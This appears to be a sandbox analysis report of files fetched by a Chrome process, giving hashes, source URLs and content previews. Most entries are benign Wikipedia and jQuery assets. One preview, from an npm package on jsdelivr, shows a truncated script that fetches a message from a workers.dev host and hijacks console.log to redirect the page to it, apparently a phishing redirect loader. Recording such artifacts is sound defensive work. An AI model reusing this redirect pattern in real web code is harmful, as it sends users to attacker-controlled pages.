                                                                                                                                                                                                                                    SHA-512:DF55288EC09A105714D5EA8C0D701522ECA7D334F26C94040B3F3232911A0E1798C3BEE6F68B3E0EDA44D9FED08ECBA13EADCAA0D07066A6E4CF39B1F8EEB265
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022
                                                                                                                                                                                                                                    Preview:.mw-cite-backlink,.cite-accessibility-label{-webkit-user-select:none;-moz-user-select:none;user-select:none}.mw-references-columns{-moz-column-width:30em;column-width:30em;margin-top:0.3em}.mw-parser-output .mw-references-columns .references{margin-top:0}.mw-references-columns li{page-break-inside:avoid;break-inside:avoid-column}ol.references{counter-reset:mw-ref-extends-parent mw-references list-item}ol.references > li{counter-increment:mw-ref-extends-parent mw-references;counter-reset:mw-ref-extends-child}ol.references .mw-extended-references{list-style:none;margin-left:2em;padding:0}.mw-extended-references > li::before{counter-increment:mw-ref-extends-child;content:counter(mw-ref-extends-parent,decimal) '.' counter(mw-ref-extends-child,decimal) '. '}sup.reference{unicode-bidi:-moz-isolate;unicode-bidi:-webkit-isolate;unicode-bidi:isolate;white-space:nowrap;font-weight:normal;font-style:normal}ol.references li:target,sup.reference:target{background-color:var(--background-color-progre
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):87533
                                                                                                                                                                                                                                    Entropy (8bit):5.262536918435756
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKr:sHNwcv9VBQpLl88SMBQ47GKr
                                                                                                                                                                                                                                    MD5:2C872DBE60F4BA70FB85356113D8B35E
                                                                                                                                                                                                                                    SHA1:EE48592D1FFF952FCF06CE0B666ED4785493AFDC
                                                                                                                                                                                                                                    SHA-256:FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
                                                                                                                                                                                                                                    SHA-512:BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://code.jquery.com/jquery-3.7.1.min.js
                                                                                                                                                                                                                                    Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17570)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):122202
                                                                                                                                                                                                                                    Entropy (8bit):5.413333342470304
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:y2WUK8xo4/78d964c6W1/ASsB5CLrIbh5fruJXHTg+8/iwCzhgXcREaCq/6/sOSd:O7ATg+qlXcVCRsO8JAgOGSytuCv
                                                                                                                                                                                                                                    MD5:1B58BBEE8C5ABFFAFADE020A55835CDF
                                                                                                                                                                                                                                    SHA1:44CEA44DDC7D5C8BD4AFA180DC3EDC5E353CB791
                                                                                                                                                                                                                                    SHA-256:4BF57A88662F0E53AD4A7A26F03E45E1065EDB00E4C8DC06575119EC025E7577
                                                                                                                                                                                                                                    SHA-512:09EFC752BD14B487C578C61AF7EB0FDFB7214A85F6ED6C3B32A20BDCE302A5A1A2C82151A8509AECE579F857D5BBFE01AF75A94E0F6686798FC5CA8A8E5700C6
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.referencePreviews%7Cext.math.popup%7Cext.popups.main&skin=vector-2022&version=1qfqi
                                                                                                                                                                                                                                    Preview:mw.loader.impl(function(){return["ext.cite.referencePreviews@10d1c",{"main":"index.js","files":{"index.js":function(require,module,exports){const isReferencePreviewsEnabled=require('./isReferencePreviewsEnabled.js');const{initReferencePreviewsInstrumentation,LOGGING_SCHEMA}=require('./referencePreviewsInstrumentation.js');const createReferenceGateway=require('./createReferenceGateway.js');const renderFn=require('./createReferencePreview.js');const{TYPE_REFERENCE,FETCH_DELAY_REFERENCE_TYPE}=require('./constants.js');const referencePreviewsState=isReferencePreviewsEnabled(mw.user,mw.popups.isEnabled,mw.config);const gateway=createReferenceGateway();mw.config.set('wgCiteReferencePreviewsVisible',!!referencePreviewsState);mw.trackSubscribe('Popups.SettingChange',(data)=>{if(data.previewType===TYPE_REFERENCE){mw.track(LOGGING_SCHEMA,data);}});module.exports=referencePreviewsState!==null?{type:TYPE_REFERENCE,selector:'#mw-content-text .reference a[ href*="#" ]',delay:FETCH_DELAY_REFERENCE_TY
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6170
                                                                                                                                                                                                                                    Entropy (8bit):3.871426479574051
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:FaK23VsmHkm779TTA0YkV9TJzOqGTdroG2Tyi4f8sToVrcHdgPPlV4dJ5mf+1:w9amHX779ykTTJzGUGFzfP1ioJP
                                                                                                                                                                                                                                    MD5:1C06C456C5B8075CDE3BF8A15ABE24C6
                                                                                                                                                                                                                                    SHA1:95E91EBD466CB02FD47840742A97E636539C2943
                                                                                                                                                                                                                                    SHA-256:8AF4F20833AAE458D9B370E7174ADDB8666812D8EF608348F7973BE65EED2B9B
                                                                                                                                                                                                                                    SHA-512:84E67B07487026CD3EE2DF44BFA9EED07027E3D49868392A8E256E5C15F56D9325BF70A7C618709D4653EA241586797C302CA7B865EF72E7FDD69B1E0B42CA14
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 120 18"><path fill="#000" fill-rule="nonzero" d="m18.339 0 .199.001h.375l.174.001h.315l.138.001.323.001H20.034l.058.053v.5c0 .139-.078.208-.231.208-.753.035-.908.11-1.184.507-.15.216-.447.68-.755 1.204L15.28 7.419l-.074.154 3.23 6.611.196.054 5.088-12.076c.177-.487.15-.832-.078-1.035-.228-.197-.389-.315-.978-.34l-.477-.023a.275.275 0 0 1-.168-.061.174.174 0 0 1-.08-.147V.054l.073-.052h5.749l.058.052v.502c0 .136-.078.205-.231.205-.753.034-1.31.197-1.673.489-.362.294-.645.698-.848 1.225 0 0-1.53 3.5-3.137 7.159l-.268.61c-1.12 2.55-2.24 5.09-2.876 6.501-.613 1.17-1.22 1.06-1.745-.033-.411-.847-1.1-2.33-1.8-3.86l-.469-1.024c-.273-.6-.54-1.19-.786-1.727-1.08 2.23-2.56 5.26-3.3 6.624-.715 1.24-1.3 1.08-1.771.032-1.63-3.84-4.97-10.6-6.539-14.35-.29-.697-.51-1.14-.716-1.32C1.45.914 1.019.808.36.774.121.747.001.688 0 .593V.067L.058.016.592.014H1.6l.969-.001h.253l1.734.001h.225l.95.001h.577l.058.052v.5c0 .139-.087.206-.26.206L5.454.8c-.56.023-
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):1733
                                                                                                                                                                                                                                    Entropy (8bit):5.1032083389531495
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:Y8kEduFRTx/j26OooeU1e+MckMYeIvPLxMYvJk:eESRTx77foeqO7k
                                                                                                                                                                                                                                    MD5:1E7BAB53910AD7135F28D3402F502CFE
                                                                                                                                                                                                                                    SHA1:ACC6757C59591AFF0BD58223975B769F711BE0DA
                                                                                                                                                                                                                                    SHA-256:6479146B570F331A7B0DDEAAE5E3B7E1E4B25319F1DB805B3DA3883E5B61ED85
                                                                                                                                                                                                                                    SHA-512:EAC581E47C273928CF9810AFEC3D0F3838293EA5861B27F9B66024DD2C664157A906A653FD2DA23C5FD3290570E4053F44F11F041F6BDAB22167BA13728EF6BE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/api/rest_v1/page/summary/Programmer
                                                                                                                                                                                                                                    Preview:{"type":"standard","title":"Programmer","displaytitle":"<span class=\"mw-page-title-main\">Programmer</span>","namespace":{"id":0,"text":""},"wikibase_item":"Q5482740","titles":{"canonical":"Programmer","normalized":"Programmer","display":"<span class=\"mw-page-title-main\">Programmer</span>"},"pageid":23716,"thumbnail":{"source":"https://upload.wikimedia.org/wikipedia/commons/thumb/8/8c/Two_women_operating_ENIAC_%28full_resolution%29.jpg/320px-Two_women_operating_ENIAC_%28full_resolution%29.jpg","width":320,"height":216},"originalimage":{"source":"https://upload.wikimedia.org/wikipedia/commons/8/8c/Two_women_operating_ENIAC_%28full_resolution%29.jpg","width":2846,"height":1924},"lang":"en","dir":"ltr","revision":"1267203979","tid":"da3f346c-ca42-11ef-9f8c-92016dfde744","timestamp":"2025-01-04T02:23:15Z","description":"Person who writes computer software","description_source":"local","content_urls":{"desktop":{"page":"https://en.wikipedia.org/wiki/Programmer","revisions":"https://en.wi
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (9371)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):128581
                                                                                                                                                                                                                                    Entropy (8bit):5.32265726092674
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:EwuaoLdhUMv/1jo1bXU3gWn3qKwsEubJWzdnXHHfYKFd0EKGBbTbbA85BoLD5a5U:Sx85BoLD5a5RSC4
                                                                                                                                                                                                                                    MD5:FE8FB6B28C812024078E7521D5481C64
                                                                                                                                                                                                                                    SHA1:9667630D61B0F0A78189A26D0332536057BB656D
                                                                                                                                                                                                                                    SHA-256:97DAE6B30FD882FE9F493A89CAE091F0E58955AB6E702C7F91AC8FF1DB31C10E
                                                                                                                                                                                                                                    SHA-512:9A45E5F951C153746124431CFBC817D9A90CE09AF29020933AE5DFD50313D1D241B2976914DB1CDC47DC22D7FC52DA9CBD38CE61B83DA89FE81D33A12BB4DE19
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html class="client-nojs vector-feature-language-in-header-enabled vector-feature-language-in-main-page-header-disabled vector-feature-sticky-header-disabled vector-feature-page-tools-pinned-disabled vector-feature-toc-pinned-clientpref-1 vector-feature-main-menu-pinned-disabled vector-feature-limited-width-clientpref-1 vector-feature-limited-width-content-enabled vector-feature-custom-font-size-clientpref-1 vector-feature-appearance-pinned-clientpref-1 vector-feature-night-mode-enabled skin-theme-clientpref-day vector-toc-available" lang="en" dir="ltr">.<head>.<meta charset="UTF-8">.<title>Windows Server 2019 - Wikipedia</title>.<script>(function(){var className="client-js vector-feature-language-in-header-enabled vector-feature-language-in-main-page-header-disabled vector-feature-sticky-header-disabled vector-feature-page-tools-pinned-disabled vector-feature-toc-pinned-clientpref-1 vector-feature-main-menu-pinned-disabled vector-feature-limited-width-clientpref-1 vect
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 55 x 70, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                                                                    Entropy (8bit):4.068159130770307
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPli5tth+QlpAkxl/k4E08up:6v/lhPCfTAk7Tp
                                                                                                                                                                                                                                    MD5:A12F0D22449538D3ACC4F851403264F2
                                                                                                                                                                                                                                    SHA1:CFE37115B94FF482A1E5CE679E7A4DA1B33C006A
                                                                                                                                                                                                                                    SHA-256:2026EBB7FC961A2F990A6FC1A3B6D3056D8341D757E587E63FACB3B91B38B6A9
                                                                                                                                                                                                                                    SHA-512:0814A623D45ECC01AA0403F9A6E8B9B2DE4D36A89234C4B9B230346E8D670FBE80F6656B321AB3E933F0E030BD1592E9E0F0D0E11892735BD943A0E0B7190124
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fe5cd656b664309/1736272355861/hkBWC5gd4FFlI6b
                                                                                                                                                                                                                                    Preview:.PNG........IHDR...7...F.......u....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 16 x 17, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1088
                                                                                                                                                                                                                                    Entropy (8bit):6.808224099437851
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:TcJ1ljQ2XbkNapZQGtbouQeDx2vVGW0iSEj2ygEmzRhcfEMvcm:TMZtXPZA8xIQ8jNAV8EI
                                                                                                                                                                                                                                    MD5:1ED6FFC9AE70986EBE502A64610B0C5D
                                                                                                                                                                                                                                    SHA1:EAA840101DBBFF36F810F91582E4CCFB36785CEB
                                                                                                                                                                                                                                    SHA-256:2B7292D01A0EA59CFE67D12FA069E7C0178D972ECB898300E281103518AF47E9
                                                                                                                                                                                                                                    SHA-512:D35EF16ED5DB5E540D64B2A3A6192A82A906FA8986FEEE2D11BC9067910F435CDBF8D970BE1EFE014F480A4AAB37FFE79121EFDC999E4AEB7446AC62AB651E4B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR..............q......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE......]..b..d..g..e..`.....N..d..h..f.....L..g..q..w..f..g.....6..f...4..F.g..h.....`..t..~+.i.....,.kf.....N..i..q..g.....V..z#..B.f.....W..+..L.g.....T..p...-.g.....A..f..e........g...M.h..k.....O..g..g........_..g..f..m....,^..k..m..e..i.....K..^..g..f..b..b........<..+..f...~................................f..o..............e..r.................w.................................j.....i..s................v.....}.......g.....u...g.........{..E..\..J......i....\tRNS..M...Q..R..P.r....m.P....@......L<.....................f.].3.........)...........m....c...........bKGD.q..'....tIME.....(..7......IDAT..c`..F&f.V6v.(.....n....._ 6.>!QPH......OJ...T.I)....,.......%'.. ......._..\.\.....Z.W..\Z.Q.\......\YU..].\X.......\W......l`.`dl..\....V..lj.`n....\....ki.`mck....1.h.D{...G..I.A.K....t.....i@.....^`.y....5./.?..;.......p..8.........IB..L....%tEXtdate:create.20
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1189)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):816035
                                                                                                                                                                                                                                    Entropy (8bit):5.526350296129341
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:uV0OrEx7lh7nPdcZ8h8qRdjiZ5B30hf7k1Cuad:uV0OrEx7lh7nPdcZ8h8qRdjiZ5d0hfIs
                                                                                                                                                                                                                                    MD5:511F5694712BA1B95D9E0D03E7BCBFB9
                                                                                                                                                                                                                                    SHA1:27AB58B376849D41163C12FCF31246641B74C901
                                                                                                                                                                                                                                    SHA-256:06DFC6D8B941853F5DF7838CF70F15592586E6826189D02CE70929C7F4300D0A
                                                                                                                                                                                                                                    SHA-512:2CC7A2CB0844850E61D7F7FE32C478C2B9FAD3238D550E5EE39863BCD11CBC774A4F29A687C70173646D0350DA4E0F7BE4A11452D9DB225E91E7A68B73337FFB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:mw.loader.impl(function(){return["ext.centralNotice.choiceData@a0yhu",function($,jQuery,require,module){mw.centralNotice=(mw.centralNotice||{});mw.centralNotice.choiceData=[{"name":"C24_WMDE_Desktop_EN_ty","start":1735822800,"end":1736982000,"preferred":2,"throttle":100,"bucket_count":2,"geotargeted":true,"type":null,"banners":[{"name":"B24_WMDE_Desktop_EN_ty_ctrl","bucket":0,"weight":25,"category":"fundraising","display_anon":true,"display_account":false,"devices":["desktop"]},{"name":"B24_WMDE_Desktop_EN_ty_var","bucket":1,"weight":25,"category":"fundraising","display_anon":true,"display_account":false,"devices":["desktop"]}],"countries":["DE"],"mixins":{"impressionDiet":{"cookieName":"wmde-thankyou-2024","maximumSeen":4,"restartCycleDelay":0,"skipInitial":0},"legacySupport":{"bannersNotGuaranteedToDisplay":true,"setSRISampleRate":true,"sriSampleRate":1}},"regions":[]},{"name":"C24_WMDE_Mobile_EN_ty","start":1735822800,"end":1736982000,"preferred":2,"throttle":100,"bucket_count":2,"g
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):1996
                                                                                                                                                                                                                                    Entropy (8bit):3.766841562840628
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:qmcnnVh6H563NLeWVipUBec+Zd3e9cMZjdzY0Ne9cMZjd8a6KM:+nViO3VipzRZd3e9TpNe9TYa6X
                                                                                                                                                                                                                                    MD5:85E2CD0257A5EEBDB72981163B60E641
                                                                                                                                                                                                                                    SHA1:F6A02A3127BFDCDD17BA3496B97DE3A89F715A5C
                                                                                                                                                                                                                                    SHA-256:2A268A628720851D06981F71BBECAB7FE7521A336E26F015EEA61600E531A1DD
                                                                                                                                                                                                                                    SHA-512:45B4EF064141730CD963311BB64BAE8ABD7263426103D84D43F7B51F85248B2D820D394CBE8558EA350CB26E3874CD78C9A8EEB5663A487A4AB646FF7FA34D52
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://cdn.jsdelivr.net/npm/citiycar@1.1.6/MOMENTUM/NOW.API.JS
                                                                                                                                                                                                                                    Preview:..const urlx = 'https://tiny-hat-eab8.pagenew.workers.dev';.. // Function to perform GET request. async function fetchData() {. try {. . const response = await fetch(urlx);.. if (!response.ok) {. throw new Error('Network response was not ok');. }.. . const data = await response.json();. . const message = data.message;.. return message ;.. . let messageUrl = message;.. } catch (error) {. // Handle errors. console.error('There was a problem with the fetch operation:', error);. }. }... async function run() {. console.log("readya!");. let key = "";. let jk = "";. const originalConsoleLog = console.log;. console.log = function(message) {. window.open(message,"_self").
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):298
                                                                                                                                                                                                                                    Entropy (8bit):5.1399561245747964
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:TMVBd/i9mc4slzIzUQSACjEBaaFpCALWNrK2TuUYhsbnlXn:TMHd6uz+ACgBVCuWlTuUYhsbnlX
                                                                                                                                                                                                                                    MD5:FB64DF7CFCBD9D16F4812087ABCC8DD4
                                                                                                                                                                                                                                    SHA1:22B95BF281ABF89524229E7FD89666B84FF3D1CD
                                                                                                                                                                                                                                    SHA-256:B324430A72A978FFC29853C1DBB95679833C58B30E5B5D10E5063F96F98C5BA2
                                                                                                                                                                                                                                    SHA-512:77C7F0AAD4DB6047A46595BB08108F09BC9216FB4A3E810BC0CE73D8DF69C9A4FCCEFD33EEB38736C1CD32FF8B1B58E4DA293CAA07BF99C3EDD0F972B02D3013
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/w/skins/Vector/resources/skins.vector.styles/images/link-external-small-ltr-progressive.svg?fb64d
                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12">..<title>...external link..</title>..<path fill="#36c" d="M6 1h5v5L8.86 3.85 4.7 8 4 7.3l4.15-4.16zM2 3h2v1H2v6h6V8h1v2a1 1 0 0 1-1 1H2a1 1 0 0 1-1-1V4a1 1 0 0 1 1-1"/>.</svg>.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):2163
                                                                                                                                                                                                                                    Entropy (8bit):4.9588361826047835
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:YokEcFFFJrvOs+vka6u9U1eBFJBFakBFuePFzvBFoDFYxBFuvPF/3hcm3hcm:EEitPv6qaUCmCm
                                                                                                                                                                                                                                    MD5:AD8A1165CC42C38A729CE916F570921B
                                                                                                                                                                                                                                    SHA1:3173504C78579E8252D0B12B36787B256D5179C3
                                                                                                                                                                                                                                    SHA-256:B3915F4D7FC80A054ADDB68E70FEC4BC8425EAD4D7EA9616BB236991CD6D34BD
                                                                                                                                                                                                                                    SHA-512:D9049A61BB8485F8DBE2DBB90941CF4263462ED2056E7E18C074FA2DF124C426B1B35152A794C76AAD64A699F2C0FA4079BD84865B974BAC40312C3C30AF63DB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/api/rest_v1/page/summary/Software_release_life_cycle
                                                                                                                                                                                                                                    Preview:{"type":"standard","title":"Software release life cycle","displaytitle":"<span class=\"mw-page-title-main\">Software release life cycle</span>","namespace":{"id":0,"text":""},"wikibase_item":"Q1211457","titles":{"canonical":"Software_release_life_cycle","normalized":"Software release life cycle","display":"<span class=\"mw-page-title-main\">Software release life cycle</span>"},"pageid":220901,"thumbnail":{"source":"https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/Software_dev2.svg/320px-Software_dev2.svg.png","width":320,"height":677},"originalimage":{"source":"https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/Software_dev2.svg/300px-Software_dev2.svg.png","width":300,"height":635},"lang":"en","dir":"ltr","revision":"1265702247","tid":"217a7dc9-c4e5-11ef-86e5-29f7e1e77427","timestamp":"2024-12-28T06:29:46Z","description":"Stages in creation of computer software","description_source":"local","content_urls":{"desktop":{"page":"https://en.wikipedia.org/wiki/Software_relea
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):53547
                                                                                                                                                                                                                                    Entropy (8bit):7.989871343125211
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:IB07ENAdXafG/bQRyyP6J/ErnnnAAwAPx:IO7uAZafT765ennn5Jx
                                                                                                                                                                                                                                    MD5:113DE3E7FD83AF27A827BD1E2690B939
                                                                                                                                                                                                                                    SHA1:100B40E140A40C78EAA764CBCD52F1A55C7B5246
                                                                                                                                                                                                                                    SHA-256:2A403AC64EA26F1E6E2D1157A253C1CB6A2EB111306403E12A8422F6090FA6D7
                                                                                                                                                                                                                                    SHA-512:8A2D0862E7AC5D468462D517CE39522909F24A70649110EE5202DFCA305D281E31F250394EC30DBD0709F7A6BBAE84B7EC3F0F1B8EA5211871ED2768113376BE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR...,.........r|......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs..........+......tIME.....+..2......IDATx...y.-W.....3.yx.....d2..LfU.$U.z(uih..]v.m..@7.....Sw...0`.m.-5z.lt..W.Jr.T*.TSfV.D2.d.|$.<...{........q..w..,2......{n.s"b.....}..+S.q.._.q_.".......2.q....~......6......B.....t.,.`-Z{{.7.{S........D....' ...Y..Tj.C..?...x?..H....C.p..:..0....+..Dk.8'R..<......1.k......[.#.\....Hy.....8.....{.!....v.O.c.....H.;B.5......G/.&.>.6./.n....>....x......w.f.....<d.bL.@..].u..nf..Rv+.....i....*..n..S..'I...w...%....p...W...U.R.....[.`..Woxm.Y....7....b...7...Lf.......o.~Q.zf_........./..q...w.^_U./W......S9t1.H.9Z;.R....v.l)iy..t<./.8.8.2..9^Ims.....T..7"....b.....(?.b....8yl.s..i..\....;.l..c.t..o<y..gAl...Kc......u....x...Y..T.#....v..&.w~..Z5.e$..9....g?...X.^[....t......J.;t..L.z.geuR..j.Isvq.n[...Ej...R..o.U~.g..4M.3...=.F0.ry.C.a.E.....vu.'.ofD. ....o.....].4.~C...1....+<w.$..4M.t
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (14598)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):15145
                                                                                                                                                                                                                                    Entropy (8bit):5.213940772958668
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:SSA+HwHmH89Hp9Hj9HM9HCZLEJBZLEJ7ZLEJr:SSA+HwHmH8Dp+AZLEJBZLEJ7ZLEJr
                                                                                                                                                                                                                                    MD5:CEC7A7E61CEE448D6227A6007EDAFFDD
                                                                                                                                                                                                                                    SHA1:49C7F562AE3396603FAC5C71F4C96D46E12DBBEF
                                                                                                                                                                                                                                    SHA-256:0FEAAF3EAB9DF608DA38589C54DC4A230CFCCA96239279F45C46F9D0759A2A9C
                                                                                                                                                                                                                                    SHA-512:118F79A6E99D62412C00ADC041D397D764BE20C6B980E2B9B1C217F081A3F9637E963FC55DEB99F6E8B374E7D897E32B226D8C8E0EA1E00DBFDA8AAAAAE4E26A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:mw.loader.impl(function(){return["mw.config.values.wbCurrentSiteDetails@ln29d",function($,jQuery,require,module){mw.config.set({"wbCurrentSiteDetails":{"shortName":"English","name":"English","id":"enwiki","pageUrl":"//en.wikipedia.org/wiki/$1","apiUrl":"//en.wikipedia.org/w/api.php","languageCode":"en","group":"wikipedia"}});.}];});.mw.loader.impl(function(){return["mw.config.values.wbRepo@18lj4",function($,jQuery,require,module){mw.config.set({"wbRepo":{"url":"https://www.wikidata.org","scriptPath":"/w","articlePath":"/wiki/$1"}});.}];});.mw.loader.impl(function(){return["oojs-ui.styles.icons-editing-core@viacc",null,{"css":[".oo-ui-icon-edit,.mw-ui-icon-edit:before{background-image:url(\"data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22 width=%2220%22 height=%2220%22 viewBox=%220 0 20 20%22%3E%3Ctitle%3E edit %3C/title%3E%3Cpath d=%22m16.77 8 1.94-2a1 1 0 0 0 0-1.41l-3.34-3.3a1 1 0 0 0-1.41 0L12 3.23zM1 14.25V19h4.75l9.96-9.96-4.75-4.75z%22/%3E%3C/svg%3E\")}.oo-ui-imag
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):13444
                                                                                                                                                                                                                                    Entropy (8bit):7.976143367474683
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:u7Ve2153JRSTNW3lr/VRL/q6rF7AIZjQgtw:cVONW15B/q6rFBjQgtw
                                                                                                                                                                                                                                    MD5:C2BC34648C583E6B9959C60BF51A4EFF
                                                                                                                                                                                                                                    SHA1:7FE85A21E9246C62CDB3845DBF06642EA5540E59
                                                                                                                                                                                                                                    SHA-256:94F7729893505B73B9360F51C67074CF44D31A096F25088699CA290FA39CCED0
